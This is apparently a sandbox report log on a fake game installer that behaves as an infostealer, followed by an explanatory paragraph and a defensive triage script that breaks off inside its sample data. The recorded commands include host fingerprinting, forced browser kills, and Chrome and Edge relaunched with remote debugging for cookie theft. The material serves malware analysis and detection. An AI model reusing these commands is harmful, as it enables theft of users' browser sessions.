Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Steam.exe")
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "javaw.exe")
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\Yoranis Setup.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Yoranis Setup.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Yoranis Setup.exe | File read: C:\Users\user\Desktop\Yoranis Setup.exe
Source: unknown | Process created: C:\Users\user\Desktop\Yoranis Setup.exe "C:\Users\user\Desktop\Yoranis Setup.exe"
Source: C:\Users\user\Desktop\Yoranis Setup.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq YoransSetup.exe" /FO csv | "C:\Windows\system32\find.exe" "YoransSetup.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq YoransSetup.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "YoransSetup.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1664 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /i "Speed"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --mojo-platform-channel-handle=2404 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq msedge.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq msedge.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq firefox.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq chrome.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq msedge.exe""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq firefox.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq iexplore.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq chrome.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq msedge.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq firefox.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq iexplore.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq chrome.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --disable-gpu --no-sandbox --window-position=-32000,-32000
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,3448241921201964185,6892278070021911797,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2412 /prefetch:3
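The process-creation entries above are the evidence behind three of the report's signatures: the wmic/PowerShell hardware and OS queries plus the curl request to api.ipify.org (fingerprinting, often a VM check), the sweep of `taskkill /IM <browser> /F` commands, and Chrome and Edge being relaunched from the sample with `--remote-debugging-port=9223` in the user's Default profile, sandbox off and the window parked off-screen. The last one is the Application-Bound Encryption bypass: with a DevTools port open on the victim's own profile, the stealer asks the running browser for its cookies over the debugging protocol instead of decrypting the App-Bound key itself. The following triage script is an added example, not part of the Joe Sandbox report; it assumes one entry per line in a `Source: <parent> | Process created: <image> <command line>` layout, the sample entries in `SAMPLE_LOG` are constructed from the command lines shown on this page, and the detection names and the burst threshold are the author's choices.

```python
"""Triage sandbox process-creation entries for infostealer tradecraft."""
import json
import re
from collections import defaultdict

# Constructed sample: a subset of the report's entries in the assumed layout.
SAMPLE_LOG = r"""
Source: unknown | Process created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
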